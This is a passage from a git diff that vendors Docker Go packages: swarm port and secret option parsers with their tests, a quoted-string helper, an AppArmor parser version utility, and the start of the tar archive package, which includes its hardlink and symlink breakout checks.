== "" { + pConfig.Protocol = swarm.PortConfigProtocolTCP + } + + p.ports = append(p.ports, pConfig) + } else { + // short syntax + portConfigs := []swarm.PortConfig{} + // We can ignore errors because the format was already validated by ValidatePort + ports, portBindings, _ := nat.ParsePortSpecs([]string{value}) + + for port := range ports { + portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...) + } + p.ports = append(p.ports, portConfigs...) + } + return nil +} + +// Type returns the type of this option +func (p *PortOpt) Type() string { + return "port" +} + +// String returns a string repr of this option +func (p *PortOpt) String() string { + ports := []string{} + for _, port := range p.ports { + repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode) + ports = append(ports, repr) + } + return strings.Join(ports, ", ") +} + +// Value returns the ports +func (p *PortOpt) Value() []swarm.PortConfig { + return p.ports +} + +// ConvertPortToPortConfig converts ports to the swarm type +func ConvertPortToPortConfig( + port nat.Port, + portBindings map[nat.Port][]nat.PortBinding, +) []swarm.PortConfig { + ports := []swarm.PortConfig{} + + for _, binding := range portBindings[port] { + hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16) + ports = append(ports, swarm.PortConfig{ + //TODO Name: ? + Protocol: swarm.PortConfigProtocol(strings.ToLower(port.Proto())), + TargetPort: uint32(port.Int()), + PublishedPort: uint32(hostPort), + PublishMode: swarm.PortConfigPublishModeIngress, + }) + } + return ports +} diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go new file mode 100644 index 0000000000..67bcf8f1d9 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/port_test.go @@ -0,0 +1,259 @@ +package opts + +import ( + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestPortOptValidSimpleSyntax(t *testing.T) { + testCases := []struct { + value string + expected []swarm.PortConfig + }{ + { + value: "80", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80:8080", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "8080:80/tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80:8080/udp", + expected: []swarm.PortConfig{ + { + Protocol: "udp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80-81:8080-8081/tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "tcp", + TargetPort: 8081, + PublishedPort: 81, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80-82:8080-8082/udp", + expected: []swarm.PortConfig{ + { + Protocol: "udp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "udp", + TargetPort: 8081, + PublishedPort: 81, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "udp", + TargetPort: 8082, + PublishedPort: 82, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + } + for _, tc := range testCases { + var port PortOpt + assert.NilError(t, port.Set(tc.value)) + assert.Equal(t, len(port.Value()), len(tc.expected)) + for _, expectedPortConfig := range tc.expected { + assertContains(t, port.Value(), expectedPortConfig) + } + } +} + +func TestPortOptValidComplexSyntax(t *testing.T) { + testCases := []struct { + value string + expected []swarm.PortConfig + }{ + { + value: "target=80", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + Protocol: "tcp", + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,published=8080,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "published=80,target=8080,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,published=8080,protocol=tcp,mode=host", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "host", + }, + }, + }, + { + value: "target=80,published=8080,mode=host", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "host", + Protocol: "tcp", + }, + }, + }, + { + value: "target=80,published=8080,mode=ingress", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "ingress", + Protocol: "tcp", + }, + }, + }, + } + for _, tc := range testCases { + var port PortOpt + assert.NilError(t, port.Set(tc.value)) + assert.Equal(t, len(port.Value()), len(tc.expected)) + for _, expectedPortConfig := range tc.expected { + assertContains(t, port.Value(), expectedPortConfig) + } + } +} + +func TestPortOptInvalidComplexSyntax(t *testing.T) { + testCases := []struct { + value string + expectedError string + }{ + { + value: "invalid,target=80", + expectedError: "invalid field", + }, + { + value: "invalid=field", + expectedError: "invalid field", + }, + { + value: "protocol=invalid", + expectedError: "invalid protocol value", + }, + { + value: "target=invalid", + expectedError: "invalid syntax", + }, + { + value: "published=invalid", + expectedError: "invalid syntax", + }, + { + value: "mode=invalid", + expectedError: "invalid publish mode value", + }, + { + value: "published=8080,protocol=tcp,mode=ingress", + expectedError: "missing mandatory field", + }, + { + value: `target=80,protocol="tcp,mode=ingress"`, + expectedError: "non-quoted-field", + }, + { + value: `target=80,"protocol=tcp,mode=ingress"`, + expectedError: "invalid protocol value", + }, + } + for _, tc := range testCases { + var port PortOpt + assert.Error(t, port.Set(tc.value), tc.expectedError) + } +} + +func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) { + var contains = false + for _, portConfig := range portConfigs { + if portConfig == expected { + contains = true + break + } + } + if !contains { + t.Errorf("expected %v to contain %v, did not", portConfigs, expected) + } +} diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go new file mode 100644 index 0000000000..fb1e5374bc --- /dev/null +++ b/vendor/github.com/docker/docker/opts/quotedstring.go @@ -0,0 +1,37 @@ +package opts + +// QuotedString is a string that may have extra quotes around the value. The +// quotes are stripped from the value. +type QuotedString struct { + value *string +} + +// Set sets a new value +func (s *QuotedString) Set(val string) error { + *s.value = trimQuotes(val) + return nil +} + +// Type returns the type of the value +func (s *QuotedString) Type() string { + return "string" +} + +func (s *QuotedString) String() string { + return string(*s.value) +} + +func trimQuotes(value string) string { + lastIndex := len(value) - 1 + for _, char := range []byte{'\'', '"'} { + if value[0] == char && value[lastIndex] == char { + return value[1:lastIndex] + } + } + return value +} + +// NewQuotedString returns a new quoted string option +func NewQuotedString(value *string) *QuotedString { + return &QuotedString{value: value} +} diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go new file mode 100644 index 0000000000..0ebf04bbe0 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go @@ -0,0 +1,28 @@ +package opts + +import ( + "github.com/docker/docker/pkg/testutil/assert" + "testing" +) + +func TestQuotedStringSetWithQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("\"something\"")) + assert.Equal(t, qs.String(), "something") + assert.Equal(t, value, "something") +} + +func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("\"something'")) + assert.Equal(t, qs.String(), "\"something'") +} + +func TestQuotedStringSetWithNoQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("something")) + assert.Equal(t, qs.String(), "something") +} diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go new file mode 100644 index 0000000000..1fefcf8434 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/secret.go @@ -0,0 +1,107 @@ +package opts + +import ( + "encoding/csv" + "fmt" + "os" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/api/types" +) + +// SecretOpt is a Value type for parsing secrets +type SecretOpt struct { + values []*types.SecretRequestOption +} + +// Set a new secret value +func (o *SecretOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + options := &types.SecretRequestOption{ + Source: "", + Target: "", + UID: "0", + GID: "0", + Mode: 0444, + } + + // support a simple syntax of --secret foo + if len(fields) == 1 { + options.Source = fields[0] + options.Target = fields[0] + o.values = append(o.values, options) + return nil + } + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "source", "src": + options.Source = value + case "target": + tDir, _ := filepath.Split(value) + if tDir != "" { + return fmt.Errorf("target must not be a path") + } + options.Target = value + case "uid": + options.UID = value + case "gid": + options.GID = value + case "mode": + m, err := strconv.ParseUint(value, 0, 32) + if err != nil { + return fmt.Errorf("invalid mode specified: %v", err) + } + + options.Mode = os.FileMode(m) + default: + if len(fields) == 1 && value == "" { + + } else { + return fmt.Errorf("invalid field in secret request: %s", key) + } + } + } + + if options.Source == "" { + return fmt.Errorf("source is required") + } + + o.values = append(o.values, options) + return nil +} + +// Type returns the type of this option +func (o *SecretOpt) Type() string { + return "secret" +} + +// String returns a string repr of this option +func (o *SecretOpt) String() string { + secrets := []string{} + for _, secret := range o.values { + repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target) + secrets = append(secrets, repr) + } + return strings.Join(secrets, ", ") +} + +// Value returns the secret requests +func (o *SecretOpt) Value() []*types.SecretRequestOption { + return o.values +} diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go new file mode 100644 index 0000000000..d978c86e22 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/secret_test.go @@ -0,0 +1,79 @@ +package opts + +import ( + "os" + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestSecretOptionsSimple(t *testing.T) { + var opt SecretOpt + + testCase := "app-secret" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "app-secret") + assert.Equal(t, req.Target, "app-secret") + assert.Equal(t, req.UID, "0") + assert.Equal(t, req.GID, "0") +} + +func TestSecretOptionsSourceTarget(t *testing.T) { + var opt SecretOpt + + testCase := "source=foo,target=testing" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") +} + +func TestSecretOptionsShorthand(t *testing.T) { + var opt SecretOpt + + testCase := "src=foo,target=testing" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") +} + +func TestSecretOptionsCustomUidGid(t *testing.T) { + var opt SecretOpt + + testCase := "source=foo,target=testing,uid=1000,gid=1001" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") + assert.Equal(t, req.UID, "1000") + assert.Equal(t, req.GID, "1001") +} + +func TestSecretOptionsCustomMode(t *testing.T) { + var opt SecretOpt + + testCase := "source=foo,target=testing,uid=1000,gid=1001,mode=0444" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") + assert.Equal(t, req.UID, "1000") + assert.Equal(t, req.GID, "1001") + assert.Equal(t, req.Mode, os.FileMode(0444)) +} diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md new file mode 100644 index 0000000000..c4b78a8ad8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/README.md @@ -0,0 +1,11 @@ +pkg/ is a collection of utility packages used by the Docker project without being specific to its internals. + +Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible. +If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the +Docker organization, to facilitate re-use by other projects. However that is not the priority. + +The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core +Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad! + +Because utility packages are small and neatly separated from the rest of the codebase, they are a good +place to start for aspiring maintainers and contributors. Get in touch if you want to help maintain them! diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go new file mode 100644 index 0000000000..ffcc5647a9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go @@ -0,0 +1,91 @@ +// Package aaparser is a convenience package interacting with `apparmor_parser`. +package aaparser + +import ( + "fmt" + "os/exec" + "strconv" + "strings" +) + +const ( + binary = "apparmor_parser" +) + +// GetVersion returns the major and minor version of apparmor_parser. +func GetVersion() (int, error) { + output, err := cmd("", "--version") + if err != nil { + return -1, err + } + + return parseVersion(output) +} + +// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to +// replace the profile. +func LoadProfile(profilePath string) error { + _, err := cmd("", "-r", profilePath) + if err != nil { + return err + } + return nil +} + +// cmd runs `apparmor_parser` with the passed arguments. +func cmd(dir string, arg ...string) (string, error) { + c := exec.Command(binary, arg...) + c.Dir = dir + + output, err := c.CombinedOutput() + if err != nil { + return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err) + } + + return string(output), nil +} + +// parseVersion takes the output from `apparmor_parser --version` and returns +// a representation of the {major, minor, patch} version as a single number of +// the form MMmmPPP {major, minor, patch}. +func parseVersion(output string) (int, error) { + // output is in the form of the following: + // AppArmor parser version 2.9.1 + // Copyright (C) 1999-2008 Novell Inc. + // Copyright 2009-2012 Canonical Ltd. + + lines := strings.SplitN(output, "\n", 2) + words := strings.Split(lines[0], " ") + version := words[len(words)-1] + + // split by major minor version + v := strings.Split(version, ".") + if len(v) == 0 || len(v) > 3 { + return -1, fmt.Errorf("parsing version failed for output: `%s`", output) + } + + // Default the versions to 0. + var majorVersion, minorVersion, patchLevel int + + majorVersion, err := strconv.Atoi(v[0]) + if err != nil { + return -1, err + } + + if len(v) > 1 { + minorVersion, err = strconv.Atoi(v[1]) + if err != nil { + return -1, err + } + } + if len(v) > 2 { + patchLevel, err = strconv.Atoi(v[2]) + if err != nil { + return -1, err + } + } + + // major*10^5 + minor*10^3 + patch*10^0 + numericVersion := majorVersion*1e5 + minorVersion*1e3 + patchLevel + return numericVersion, nil +} diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go new file mode 100644 index 0000000000..69bc8d2fd8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go @@ -0,0 +1,73 @@ +package aaparser + +import ( + "testing" +) + +type versionExpected struct { + output string + version int +} + +func TestParseVersion(t *testing.T) { + versions := []versionExpected{ + { + output: `AppArmor parser version 2.10 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 210000, + }, + { + output: `AppArmor parser version 2.8 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 208000, + }, + { + output: `AppArmor parser version 2.20 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 220000, + }, + { + output: `AppArmor parser version 2.05 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 205000, + }, + { + output: `AppArmor parser version 2.9.95 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 209095, + }, + { + output: `AppArmor parser version 3.14.159 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 314159, + }, + } + + for _, v := range versions { + version, err := parseVersion(v.output) + if err != nil { + t.Fatalf("expected error to be nil for %#v, got: %v", v, err) + } + if version != v.version { + t.Fatalf("expected version to be %d, was %d, for: %#v\n", v.version, version, v) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/README.md b/vendor/github.com/docker/docker/pkg/archive/README.md new file mode 100644 index 0000000000..7307d9694f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/README.md @@ -0,0 +1 @@ +This code provides helper functions for dealing with archive files. diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go new file mode 100644 index 0000000000..3261c4f498 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive.go @@ -0,0 +1,1175 @@ +package archive + +import ( + "archive/tar" + "bufio" + "bytes" + "compress/bzip2" + "compress/gzip" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/system" +) + +type ( + // Compression is the state represents if compressed or not. + Compression int + // WhiteoutFormat is the format of whiteouts unpacked + WhiteoutFormat int + // TarChownOptions wraps the chown options UID and GID. + TarChownOptions struct { + UID, GID int + } + + // TarOptions wraps the tar options. + TarOptions struct { + IncludeFiles []string + ExcludePatterns []string + Compression Compression + NoLchown bool + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + ChownOpts *TarChownOptions + IncludeSourceDir bool + // WhiteoutFormat is the expected on disk format for whiteout files. + // This format will be converted to the standard format on pack + // and from the standard format on unpack. + WhiteoutFormat WhiteoutFormat + // When unpacking, specifies whether overwriting a directory with a + // non-directory is allowed and vice versa. + NoOverwriteDirNonDir bool + // For each include when creating an archive, the included name will be + // replaced with the matching name from this map. + RebaseNames map[string]string + InUserNS bool + } + + // Archiver allows the reuse of most utility functions of this package + // with a pluggable Untar function. Also, to facilitate the passing of + // specific id mappings for untar, an archiver can be created with maps + // which will then be passed to Untar operations + Archiver struct { + Untar func(io.Reader, string, *TarOptions) error + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + } + + // breakoutError is used to differentiate errors related to breaking out + // When testing archive breakout in the unit tests, this error is expected + // in order for the test to pass. + breakoutError error +) + +var ( + // ErrNotImplemented is the error message of function not implemented. + ErrNotImplemented = errors.New("Function not implemented") + defaultArchiver = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil} +) + +const ( + // HeaderSize is the size in bytes of a tar header + HeaderSize = 512 +) + +const ( + // Uncompressed represents the uncompressed. + Uncompressed Compression = iota + // Bzip2 is bzip2 compression algorithm. + Bzip2 + // Gzip is gzip compression algorithm. + Gzip + // Xz is xz compression algorithm. + Xz +) + +const ( + // AUFSWhiteoutFormat is the default format for whiteouts + AUFSWhiteoutFormat WhiteoutFormat = iota + // OverlayWhiteoutFormat formats whiteout according to the overlay + // standard. + OverlayWhiteoutFormat +) + +// IsArchive checks for the magic bytes of a tar or any supported compression +// algorithm. +func IsArchive(header []byte) bool { + compression := DetectCompression(header) + if compression != Uncompressed { + return true + } + r := tar.NewReader(bytes.NewBuffer(header)) + _, err := r.Next() + return err == nil +} + +// IsArchivePath checks if the (possibly compressed) file at the given path +// starts with a tar file header. +func IsArchivePath(path string) bool { + file, err := os.Open(path) + if err != nil { + return false + } + defer file.Close() + rdr, err := DecompressStream(file) + if err != nil { + return false + } + r := tar.NewReader(rdr) + _, err = r.Next() + return err == nil +} + +// DetectCompression detects the compression algorithm of the source. +func DetectCompression(source []byte) Compression { + for compression, m := range map[Compression][]byte{ + Bzip2: {0x42, 0x5A, 0x68}, + Gzip: {0x1F, 0x8B, 0x08}, + Xz: {0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00}, + } { + if len(source) < len(m) { + logrus.Debug("Len too short") + continue + } + if bytes.Compare(m, source[:len(m)]) == 0 { + return compression + } + } + return Uncompressed +} + +func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) { + args := []string{"xz", "-d", "-c", "-q"} + + return cmdStream(exec.Command(args[0], args[1:]...), archive) +} + +// DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive. +func DecompressStream(archive io.Reader) (io.ReadCloser, error) { + p := pools.BufioReader32KPool + buf := p.Get(archive) + bs, err := buf.Peek(10) + if err != nil && err != io.EOF { + // Note: we'll ignore any io.EOF error because there are some odd + // cases where the layer.tar file will be empty (zero bytes) and + // that results in an io.EOF from the Peek() call. So, in those + // cases we'll just treat it as a non-compressed stream and + // that means just create an empty layer. + // See Issue 18170 + return nil, err + } + + compression := DetectCompression(bs) + switch compression { + case Uncompressed: + readBufWrapper := p.NewReadCloserWrapper(buf, buf) + return readBufWrapper, nil + case Gzip: + gzReader, err := gzip.NewReader(buf) + if err != nil { + return nil, err + } + readBufWrapper := p.NewReadCloserWrapper(buf, gzReader) + return readBufWrapper, nil + case Bzip2: + bz2Reader := bzip2.NewReader(buf) + readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader) + return readBufWrapper, nil + case Xz: + xzReader, chdone, err := xzDecompress(buf) + if err != nil { + return nil, err + } + readBufWrapper := p.NewReadCloserWrapper(buf, xzReader) + return ioutils.NewReadCloserWrapper(readBufWrapper, func() error { + <-chdone + return readBufWrapper.Close() + }), nil + default: + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + } +} + +// CompressStream compresseses the dest with specified compression algorithm. +func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) { + p := pools.BufioWriter32KPool + buf := p.Get(dest) + switch compression { + case Uncompressed: + writeBufWrapper := p.NewWriteCloserWrapper(buf, buf) + return writeBufWrapper, nil + case Gzip: + gzWriter := gzip.NewWriter(dest) + writeBufWrapper := p.NewWriteCloserWrapper(buf, gzWriter) + return writeBufWrapper, nil + case Bzip2, Xz: + // archive/bzip2 does not support writing, and there is no xz support at all + // However, this is not a problem as docker only currently generates gzipped tars + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + default: + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + } +} + +// Extension returns the extension of a file that uses the specified compression algorithm. +func (compression *Compression) Extension() string { + switch *compression { + case Uncompressed: + return "tar" + case Bzip2: + return "tar.bz2" + case Gzip: + return "tar.gz" + case Xz: + return "tar.xz" + } + return "" +} + +type tarWhiteoutConverter interface { + ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error) + ConvertRead(*tar.Header, string) (bool, error) +} + +type tarAppender struct { + TarWriter *tar.Writer + Buffer *bufio.Writer + + // for hardlink mapping + SeenFiles map[uint64]string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + + // For packing and unpacking whiteout files in the + // non standard format. The whiteout files defined + // by the AUFS standard are used as the tar whiteout + // standard. + WhiteoutConverter tarWhiteoutConverter +} + +// canonicalTarName provides a platform-independent and consistent posix-style +//path for files and directories to be archived regardless of the platform. +func canonicalTarName(name string, isDir bool) (string, error) { + name, err := CanonicalTarNameForPath(name) + if err != nil { + return "", err + } + + // suffix with '/' for directories + if isDir && !strings.HasSuffix(name, "/") { + name += "/" + } + return name, nil +} + +// addTarFile adds to the tar archive a file from `path` as `name` +func (ta *tarAppender) addTarFile(path, name string) error { + fi, err := os.Lstat(path) + if err != nil { + return err + } + + link := "" + if fi.Mode()&os.ModeSymlink != 0 { + if link, err = os.Readlink(path); err != nil { + return err + } + } + + hdr, err := tar.FileInfoHeader(fi, link) + if err != nil { + return err + } + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + name, err = canonicalTarName(name, fi.IsDir()) + if err != nil { + return fmt.Errorf("tar: cannot canonicalize path: %v", err) + } + hdr.Name = name + + inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys()) + if err != nil { + return err + } + + // if it's not a directory and has more than 1 link, + // it's hard linked, so set the type flag accordingly + if !fi.IsDir() && hasHardlinks(fi) { + // a link should have a name that it links too + // and that linked name should be first in the tar archive + if oldpath, ok := ta.SeenFiles[inode]; ok { + hdr.Typeflag = tar.TypeLink + hdr.Linkname = oldpath + hdr.Size = 0 // This Must be here for the writer math to add up! + } else { + ta.SeenFiles[inode] = name + } + } + + capability, _ := system.Lgetxattr(path, "security.capability") + if capability != nil { + hdr.Xattrs = make(map[string]string) + hdr.Xattrs["security.capability"] = string(capability) + } + + //handle re-mapping container ID mappings back to host ID mappings before + //writing tar headers/files. We skip whiteout files because they were written + //by the kernel and already have proper ownership relative to the host + if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) { + uid, gid, err := getFileUIDGID(fi.Sys()) + if err != nil { + return err + } + xUID, err := idtools.ToContainer(uid, ta.UIDMaps) + if err != nil { + return err + } + xGID, err := idtools.ToContainer(gid, ta.GIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + hdr.Gid = xGID + } + + if ta.WhiteoutConverter != nil { + wo, err := ta.WhiteoutConverter.ConvertWrite(hdr, path, fi) + if err != nil { + return err + } + + // If a new whiteout file exists, write original hdr, then + // replace hdr with wo to be written after. Whiteouts should + // always be written after the original. Note the original + // hdr may have been updated to be a whiteout with returning + // a whiteout header + if wo != nil { + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + return err + } + if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 { + return fmt.Errorf("tar: cannot use whiteout for non-empty file") + } + hdr = wo + } + } + + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + return err + } + + if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 { + // We use system.OpenSequential to ensure we use sequential file + // access on Windows to avoid depleting the standby list. + // On Linux, this equates to a regular os.Open. + file, err := system.OpenSequential(path) + if err != nil { + return err + } + + ta.Buffer.Reset(ta.TarWriter) + defer ta.Buffer.Reset(nil) + _, err = io.Copy(ta.Buffer, file) + file.Close() + if err != nil { + return err + } + err = ta.Buffer.Flush() + if err != nil { + return err + } + } + + return nil +} + +func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error { + // hdr.Mode is in linux format, which we can use for sycalls, + // but for os.Foo() calls we need the mode converted to os.FileMode, + // so use hdrInfo.Mode() (they differ for e.g. setuid bits) + hdrInfo := hdr.FileInfo() + + switch hdr.Typeflag { + case tar.TypeDir: + // Create directory unless it exists as a directory already. + // In that case we just want to merge the two + if fi, err := os.Lstat(path); !(err == nil && fi.IsDir()) { + if err := os.Mkdir(path, hdrInfo.Mode()); err != nil { + return err + } + } + + case tar.TypeReg, tar.TypeRegA: + // Source is regular file. We use system.OpenFileSequential to use sequential + // file access to avoid depleting the standby list on Windows. + // On Linux, this equates to a regular os.OpenFile + file, err := system.OpenFileSequential(path, os.O_CREATE|os.O_WRONLY, hdrInfo.Mode()) + if err != nil { + return err + } + if _, err := io.Copy(file, reader); err != nil { + file.Close() + return err + } + file.Close() + + case tar.TypeBlock, tar.TypeChar: + if inUserns { // cannot create devices in a userns + return nil + } + // Handle this is an OS-specific way + if err := handleTarTypeBlockCharFifo(hdr, path); err != nil { + return err + } + + case tar.TypeFifo: + // Handle this is an OS-specific way + if err := handleTarTypeBlockCharFifo(hdr, path); err != nil { + return err + } + + case tar.TypeLink: + targetPath := filepath.Join(extractDir, hdr.Linkname) + // check for hardlink breakout + if !strings.HasPrefix(targetPath, extractDir) { + return breakoutError(fmt.Errorf("invalid hardlink %q -> %q", targetPath, hdr.Linkname)) + } + if err := os.Link(targetPath, path); err != nil { + return err + } + + case tar.TypeSymlink: + // path -> hdr.Linkname = targetPath + // e.g. /extractDir/path/to/symlink -> ../2/file = /extractDir/path/2/file + targetPath := filepath.Join(filepath.Dir(path), hdr.Linkname) + + // the reason we don't need to check symlinks in the path (with FollowSymlinkInScope) is because + // that symlink would first have to be created, which would be caught earlier, at this very check: + if !strings.HasPrefix(targetPath, extractDir) { + return breakoutError(fmt.Errorf("invalid symlink %q -> %q", path, hdr.Linkname)) + } + if err := os.Symlink(hdr.Linkname, path); err != nil { + return err + } + + case tar.TypeXGlobalHeader: + logrus.Debug("PAX Global Extended Headers found and ignored") + return nil + + default: + return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag) + } + + // Lchown is not supported on Windows. + if Lchown && runtime.GOOS != "windows" { + if chownOpts == nil { + chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid} + } + if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil { + return err + } + } + + var errors []string + for key, value := range hdr.Xattrs { + if err := system.Lsetxattr(path, key, []byte(value), 0); err != nil { + if err == syscall.ENOTSUP { + // We ignore errors here because not all graphdrivers support + // xattrs *cough* old versions of AUFS *cough*. However only + // 